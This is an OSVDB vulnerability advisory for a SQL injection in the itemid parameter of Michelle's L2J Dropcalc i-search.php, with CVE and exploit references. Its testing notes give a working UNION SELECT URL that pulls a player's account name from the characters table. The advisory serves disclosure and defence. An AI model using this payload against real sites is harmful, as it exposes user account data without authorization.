Michelle's L2J Dropcalc i-search.php itemid Variable SQL Injection

2007-01-31T00:00:00
ID OSVDB:36038
Type osvdb
Reporter Codebreak (codebreak1984@gmail.com)
Modified 2007-01-31T00:00:00

Description

Manual Testing Notes

http://[Target]/[Path]/i-search.php?itemid=&username=[User]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,account_name,null,null,null,null,null from characters where char_name = "[PLAYER]"

References:

ISS X-Force ID: 32003
Generic Exploit URL: http://milw0rm.com/exploits/3232
CVE-2007-0687
Bugtraq ID: 22335